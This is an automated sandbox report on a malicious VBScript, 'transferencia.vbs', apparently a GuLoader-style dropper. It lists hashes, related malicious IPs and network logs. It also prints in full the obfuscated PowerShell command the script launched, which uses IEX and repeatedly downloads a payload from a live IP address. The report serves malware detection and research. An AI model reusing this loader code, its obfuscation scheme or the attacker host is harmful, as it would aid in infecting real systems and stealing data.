          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 4m 23s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:7
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:transferencia.vbs
          Detection:MAL
          Classification:mal88.expl.evad.winVBS@4/3@0/1
          EGA Information:Failed
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 7
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .vbs
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target powershell.exe, PID 2448 because it is empty
          • Not all processes were analyzed, report is missing behavior information
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          Time | Type | Description
          03:28:01 | API Interceptor | 2982561x Sleep call for process: powershell.exe modified
          Match | Associated Sample Name / URL | Detection | Threat Name | Context
          91.109.20.161 | Justificante_01102024.vbs | malicious | GuLoader | 91.109.20.161/IHgddTBZm206.bin
          No context
          Match | Associated Sample Name / URL | Detection | Threat Name | Context
          LEASEWEB-DE-FRA-10DE | Justificante_01102024.vbs | malicious | GuLoader | 91.109.20.161
          LEASEWEB-DE-FRA-10DE | http://steam.csworkshoparts.com/filedetails/sharedfile/ak47-DeadRose/ | malicious | HTMLPhisher | 5.61.42.53
          LEASEWEB-DE-FRA-10DE | Https://25sep26ww.z13.web.core.windows.net/# | malicious | HTMLPhisher, TechSupportScam | 217.20.112.104
          LEASEWEB-DE-FRA-10DE | https://telegram-message-8n5.pages.dev/ | malicious | Unknown | 217.20.112.104
          LEASEWEB-DE-FRA-10DE | http://two.eagermint.com | malicious | Unknown | 217.20.112.104
          LEASEWEB-DE-FRA-10DE | SecuriteInfo.com.Trojan.Inject5.8445.10776.26852.exe | malicious | Unknown | 37.1.196.35
          LEASEWEB-DE-FRA-10DE | http://umjkitjtsk.top/crp/325gewfkj345 | malicious | Unknown | 84.16.251.24
          LEASEWEB-DE-FRA-10DE | 5AFlyarMds.exe | malicious | Simda Stealer | 178.162.203.226
          LEASEWEB-DE-FRA-10DE | uB31aJH4M0.exe | malicious | Simda Stealer | 178.162.203.226
          LEASEWEB-DE-FRA-10DE | M62eQtS9qP.exe | malicious | Simda Stealer | 178.162.217.107
          No context
          No context
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):11608
          Entropy (8bit):4.890472898059848
          Encrypted:false
          SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
          MD5:8A4B02D8A977CB929C05D4BC2942C5A9
          SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
          SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
          SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
          Malicious:false
          Reputation:moderate, very likely benign file
          Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Reputation:high, very likely benign file
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Reputation:high, very likely benign file
          Preview:# PowerShell test file to determine AppLocker lockdown mode
          File type:ASCII text, with very long lines (360), with CRLF line terminators
          Entropy (8bit):4.859393766408919
          TrID:
            File name:transferencia.vbs
            File size:98'404 bytes
            MD5:c68010fc942eef8e8868e5d3197aadc8
            SHA1:964fa94fcbce9a5a0499672e881b271530c7e1fa
            SHA256:08b753161a621a8235016b94f3a8c68417a8907abda998f84a4de8687a515bf4
            SHA512:c0eaa3ea38af5bfebc3d37adaba0847fc607a45321583b368f218585d904efbf743519161fb2735bac84accee88fe0f5ff8c7683806864f5b005af98f25dbe3e
            SSDEEP:3072:7o7qCwl7ZyepmHmYYuNeE3L4jxrc78lUvywnM3:ghwtZyep5fsj7gxrcQlUKl
            TLSH:8AA34921EDD50A7B0E56079DBE110F56C4FDC6188226E8FCEADE171F504286CDBBE228
            File Content Preview:..Rem Smreostes! denaturisation festkldning186 emily wearisome;..Rem Sidst; opladende unintermission; skattemaessige untenaciousness..Rem Waterlander scandinavians: siamesers? farveinstallationsprogrammer, teratoscopy..Rem Omeletfyld. papercurrency: unvin
            Icon Hash:68d69b8f86ab9a86
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Oct 3, 2024 09:28:03.262187004 CEST | 49704 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:28:03.268232107 CEST | 80 | 49704 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:28:03.268374920 CEST | 49704 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:28:03.268645048 CEST | 49704 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:28:03.273367882 CEST | 80 | 49704 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:28:24.651293993 CEST | 80 | 49704 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:28:24.651550055 CEST | 49704 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:28:24.715344906 CEST | 49704 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:28:24.716185093 CEST | 49712 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:28:24.720163107 CEST | 80 | 49704 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:28:24.721652985 CEST | 80 | 49712 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:28:24.721750021 CEST | 49712 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:28:24.721880913 CEST | 49712 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:28:24.726669073 CEST | 80 | 49712 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:28:46.096348047 CEST | 80 | 49712 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:28:46.099412918 CEST | 49712 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:28:46.099445105 CEST | 49712 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:28:46.106327057 CEST | 80 | 49712 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:28:50.341593981 CEST | 49713 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:28:50.346498966 CEST | 80 | 49713 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:28:50.346630096 CEST | 49713 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:28:50.346739054 CEST | 49713 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:28:50.351963043 CEST | 80 | 49713 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:29:11.745378971 CEST | 80 | 49713 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:29:11.745575905 CEST | 49713 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:11.745575905 CEST | 49713 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:11.747419119 CEST | 49715 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:11.750422001 CEST | 80 | 49713 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:29:11.752345085 CEST | 80 | 49715 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:29:11.752501011 CEST | 49715 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:11.752549887 CEST | 49715 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:11.757309914 CEST | 80 | 49715 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:29:33.116991997 CEST | 80 | 49715 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:29:33.119208097 CEST | 49715 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:33.119390011 CEST | 49715 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:33.124118090 CEST | 80 | 49715 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:29:37.140057087 CEST | 49716 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:37.145025015 CEST | 80 | 49716 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:29:37.145159960 CEST | 49716 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:37.145279884 CEST | 49716 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:37.150068045 CEST | 80 | 49716 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:29:58.537345886 CEST | 80 | 49716 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:29:58.537643909 CEST | 49716 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:58.537712097 CEST | 49716 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:58.538088083 CEST | 49717 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:58.548666000 CEST | 80 | 49716 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:29:58.549035072 CEST | 80 | 49717 | 91.109.20.161 | 192.168.2.5
            Oct 3, 2024 09:29:58.552438974 CEST | 49717 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:58.552620888 CEST | 49717 | 80 | 192.168.2.5 | 91.109.20.161
            Oct 3, 2024 09:29:58.557524920 CEST | 80 | 49717 | 91.109.20.161 | 192.168.2.5
            • 91.109.20.161
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.5 | 49704 | 91.109.20.161 | 80 | 2448 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            Oct 3, 2024 09:28:03.268645048 CEST | 173 | OUT | GET /Hestebremsen.chm HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: 91.109.20.161
            Connection: Keep-Alive

            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.5 | 49712 | 91.109.20.161 | 80 | 2448 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            Oct 3, 2024 09:28:24.721880913 CEST | 173 | OUT | GET /Hestebremsen.chm HTTP/1.1
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
            Host: 91.109.20.161
            Connection: Keep-Alive

            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            2 | 192.168.2.5 | 49713 | 91.109.20.161 | 80 | 2448 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            Oct 3, 2024 09:28:50.346739054 CEST | 79 | OUT | GET /Hestebremsen.chm HTTP/1.1
            Host: 91.109.20.161
            Connection: Keep-Alive

            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            3 | 192.168.2.5 | 49715 | 91.109.20.161 | 80 | 2448 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            Oct 3, 2024 09:29:11.752549887 CEST | 79 | OUT | GET /Hestebremsen.chm HTTP/1.1
            Host: 91.109.20.161
            Connection: Keep-Alive

            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            4 | 192.168.2.5 | 49716 | 91.109.20.161 | 80 | 2448 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            Oct 3, 2024 09:29:37.145279884 CEST | 79 | OUT | GET /Hestebremsen.chm HTTP/1.1
            Host: 91.109.20.161
            Connection: Keep-Alive

            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            5 | 192.168.2.5 | 49717 | 91.109.20.161 | 80 | 2448 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Timestamp | Bytes transferred | Direction | Data
            Oct 3, 2024 09:29:58.552620888 CEST | 79 | OUT | GET /Hestebremsen.chm HTTP/1.1
            Host: 91.109.20.161
            Connection: Keep-Alive



            Target ID:0
            Start time:03:27:56
            Start date:03/10/2024
            Path:C:\Windows\System32\wscript.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia.vbs"
            Imagebase:0x7ff687340000
            File size:170'496 bytes
            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Target ID:2
            Start time:03:27:58
            Start date:03/10/2024
            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Wow64 process (32bit):false
            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Patee Rutsjebaners Pumaernes Charless Topnoteringernes Centimeter #>;$Gyrectomies='Bogman';<#Preremoving monotoni afdelingslgerne Blunderers Fingredes Intwists #>;$Limpid=$host.PrivateData;If ($Limpid) {$Navicert++;}function Opbrugets52($Craftsmaster){$Postnarisnhaust=$Hellenist+$Craftsmaster.Length-$Navicert;for( $Postnaris=4;$Postnaris -lt $Postnarisnhaust;$Postnaris+=5){$Samfundslrers='nonfecund';$Informativ+=$Craftsmaster[$Postnaris];}$Informativ;}function ggepuncherne($Unpopulousness27){ & ($Topographometric) ($Unpopulousness27);}$Postnarisnertion254=Opbrugets52 'TimeMDe eo M kzVulciStillsoc l C aa Hvs/G,or5Hazi.Skak0Skun Grip(AkadWA lei C.nnUdbedOveroPreswBoilsBekj KabeNAntiTCoss Klud1Paul0,ash. Bar0Dest;A te SoftWLigniDytinEpid6.orl4Soda;P.oc VidxCer,6Sona4 nde;Unle Ra.r .rov,idg:Radi1 Med2 Moc1Brss. hon0Mode)F ey SporGMrkve FircMettkChito Tan/ Bl 2Cong0For,1 amm0Hymn0Insp1Skib0Mot,1Ring beblFFkaliHoldrLysbe.errfPicropeerxFrys/M sk1ce t2Unco1Lat . rdi0 Uds ';$billardkugle=Opbrugets52 'Mi rU TalSForhE.linrSelv- egraPediG P aeO.lyns,ggtBete ';$Ugenummer=Opbrugets52 ' An hChubt SertS umpOp,a:Bhmn/ mpe/So.s9Shit1Svas.Bobi1Nv i0Supe9 Sus.Maae2Chlo0 F s.Unde1 Egn6W ve1 Gud/FopdHPuere teas Grit B.teG orbInter jore ilamjordsAvioe DoknD,ta.CentcStonh UdfmHage ';$onymize=Opbrugets52 'Plat>Awap ';$Topographometric=Opbrugets52 'BangIMa mE skuxKalk ';$nonhallucinatory='Selsparks';$Garwin='\Dorgens.Uns';ggepuncherne (Opbrugets52 'bitm$VkstgHootlsyreoInc bK ffaCompl fas:RelaISkrinpreddSerek PetoOecapAntei IndeModirsclei Disn J mg hor=Ivin$ kaseStolnE.duv.err:Gol aSub.pAlvep PredIdena NostDa,sabesp+Unem$sandGTetaaForertr swSwaniLbernCest ');ggepuncherne (Opbrugets52 ' kyl$MolygIllulBetvoOri bSkina SkulOver: jerSSproaSapolO toa ecim rliaAn nnHermdskytr StiiRestnUtt eunre= T.e$.cheUFor g oneCasqnCarou,amlm ModmS.aceBrevrHo s. 
ompsEvalpFinnlSk.niHudktMagn(Ac,c$ TrioStkinBundy kytm UneiIn.oz Un,eGad )Armi ');ggepuncherne (Opbrugets52 'Kate[OpvuNFrfreCowstSank.EjakS BejeLicerRefivforhiinf.cBreaeA,stP .peoHabii AllnTr vtJermMHa,daTrevn fllaUtengPreaeSl,tr rdt]traw: Ci.: AsySPolleEliac aleucyrtrO,dniLet,tTel,yPersPDirrr Nono C.st.unoo Pr,cKeepoCadrlJudo Hamm=Atta Un.r[ DiaNcop eIndftMile.MammSColoeStuccMentusolbrBog,i Altt rmayAnglPContr udio attt BefoAspacArchoFredlTriaTBragyd rnpti.geM ck] rer:Rej :MuniT Taml BolsKamf1Noci2I.fl ');$Ugenummer=$Salamandrine[0];$Hexactinellid40=(Opbrugets52 'Le a$,ircGTanol jesoSperBCondA Skrlbela:CupoGOrigrGtebuuntiiHemoN onseKor =Poc,NHaece H.mWB.it-cnidOMirabultrjBaroETracCOxaltF,st s nssW.rsyNe,tsByghtMy,ieRubem s c.WaitN.uldeVaret rni.Fa iwBiseeForbbForecAub LveteISu.ee C nN BavT Dec ');ggepuncherne ($Hexactinellid40);ggepuncherne (Opbrugets52 ' S,n$FloaGBe orIntruhawkiZ.opnKonfeGirl.MohaH IsoePseuaMudcdRetseQ.adrArris inn[ Por$Fo dbFr siuklalcomplOut,a xcer .ond utukCharuPilegKos.lTo.ve.nto]Frek=,pfa$BitsPVibroLutessquatUbemnKalpa TerrAntiiFde,s Marn chieD gtrF.shtGeraiAnatoO.twnFr k2Komp5se i4 M l ');$Appartementerne=Opbrugets52 'Fdev$IndhG StorBedruUnliiFl,rn andeEpip.PaalDBengoSeiswPiannG unlskruoTo oaGlu,dlittF rii dsslRecaeStri(Mas $Inf USnevg dlneswamnpromu erdmUnstm S,jeNederdiss,Smir$EsteH andeJohaaTestdUnr wTravaPy al Va,lanaps ko ) O i ';$Headwalls=$Indkopiering;ggepuncherne (Opbrugets52 'kate$Dag,G araLEkseOGr.nBglacAF.rbLarbi:D nsSUndeANohoNMeteEsa.trBasiiBiffNRandGStums .hapCou L AceAAandnSkriSLike=Nons(OverT Pr eBesvs emotDd a-Fa.sper oaPrecTUn eh,ota Supp$Ud kh PloEEtheA Unidtragw unkAGypplGenfLNav sDann)Fecu ');while (!$Saneringsplans) {ggepuncherne (Opbrugets52 'Sati$ProcgMothlTyveo Preb ,usaHnislOdou:A orSR alopri,rEvo.t DehbEndorInt s Usmgsp cr CoroDisms S esPac.e ndrAngeeMetrrReineP,einhira=Snif$My lt JonrSammuE tue No, ') ;ggepuncherne $Appartementerne;ggepuncherne (Opbrugets52 'CuncSFrdstUdvialovbr.avtt S.i-BekoSPolylNonie 
UdleNapopArve Ribi4Kemi ');ggepuncherne (Opbrugets52 'a ro$MispgModslPlano dseb rka Bufl li: .ntSchina SagnSnapeGelar FreiSlgenKassgSides Filp verlTranaDok,n Slas Gla= S,a( FaaT.itueT ess olet lop-PantPb siaTorstPrush F k Pede$D,ffHSacce DisaAnild S,iwSl,vaAntilInfelPainsIm.r)Unlo ') ;ggepuncherne (Opbrugets52 ' Oc $MoelgdknilmarroUnpob BaraIn,llHark:StadIcymonRverd AntbBenvyshe.gBry nDowniSy,snKri,g v nsUnsakC ula,nclsTracs DupeRail=Form$ kilg Jorl epoo GenbTan aTromlPent:BeklORebsp laybFlledTaale ProsS at+Prsi+ Rus%Psyc$G afS Ko aJibblC.emaSvanmForna inn TriduncarAarvi Be nF lle La . recBonhoTel uK ntn.inet Con ') ;$Ugenummer=$Salamandrine[$Indbygningskasse];}$Vertikalernes=278564;$Binokular=29796;ggepuncherne (Opbrugets52 'Tung$Lkkeg SimlK tkoEnt b AdhaDis lRoni:VemoA.appbEnkesDybvt acrSan,uGasosOpkaiAntioUvrdnSkot T.l= at SkilG trae TrotRigs-OverCSp aoStadnWorktS.mmeOf in A tt Or. Ubev$ AfsHOcl.e s aaGhendEs awe spaRec lPer lKrtesA.at ');ggepuncherne (Opbrugets52 'Ind $AlkygTr clHopio DesbAlfaaM milXene:SexaPKrlir sl,oloantC leo KnarItattStonhTop,oMgl pToa.tLatee.yperd siaDisl Par = ebu Evan[Rer,S locyDeodsP rytUn ee Do.m ume.subiCInveo YaknRensvPendedeborAf mtPara]Rest:P,ak: WhiFUnrerOtheoBa,omToneBDes aJun sA emeDe,e6u pr4 retSSkoltBrisrKrokiChapnNe tgLan (Klft$ ,piATaulbStoks R.mt s vrTryku EqusPas iAktioHyponUfat) K a ');ggepuncherne (Opbrugets52 'Mine$ungrgArbelWelso Makb Ro apibelCont: ucuJFyrseUng.sKoras Pr.iJudicRin,aMiso Sag.=G ff Swoo[snotSSl.syGenks NontPreleCon,m Sp,. homTUltreSydhxDelrtTall.RadiE Astn nducUretoStdtdu jliSamdnSalggArge] Ra :Amus:FornAConuSSoulCGlggIAfhaITiss.TanyGNonreTj etUnc SEnketG eerKvkkiSermnsupegKami( Iow$MiliPpreir CafoUn htI dso DrirKapitCodhhSammoundepAdsttGryne VrarIsola Tea)S,ri ');ggepuncherne (Opbrugets52 'Fors$Fi agK lkl H.loPlebb UnsaOmr lMo.e:MameU ParnSletitalanBelljExtruRe srInt,iUdtao D.nuUnfes Bol=Torm$AsymJZeu eFinlsUkams Z.ai Sevc SupaMame. 
GstsVse.uPeppbtkkesZephtAmenrArali DsrnMet g Per(Mark$Ma.aVA oueD,asr ertVandi SeakArbeaUsdel F re T,krLegansc teV risTil ,Fr,e$g.ntBMajoi Fonn WoooParakDannuChlolReina,lasrGrs )Geot ');ggepuncherne $Uninjurious;"
            Imagebase:0x7ff7be880000
            File size:452'608 bytes
            MD5 hash:04029E121A0CFA5991749937DD22A1D9
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            Target ID:3
            Start time:03:27:58
            Start date:03/10/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6d64d0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:false
            Has administrator privileges:false
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

              Memory Dump Source
              • Source File: 00000002.00000002.3352113947.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd
              Memory Dump Source
              • Source File: 00000002.00000002.3353105237.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
              Memory Dump Source
              • Source File: 00000002.00000002.3353105237.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
              Memory Dump Source
              • Source File: 00000002.00000002.3353105237.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
              Memory Dump Source
              • Source File: 00000002.00000002.3353105237.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
              Memory Dump Source
              • Source File: 00000002.00000002.3353105237.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_7ff848e80000_powershell.jbxd
              Memory Dump Source
              • Source File: 00000002.00000002.3352113947.00007FF848DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DB0000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_7ff848db0000_powershell.jbxd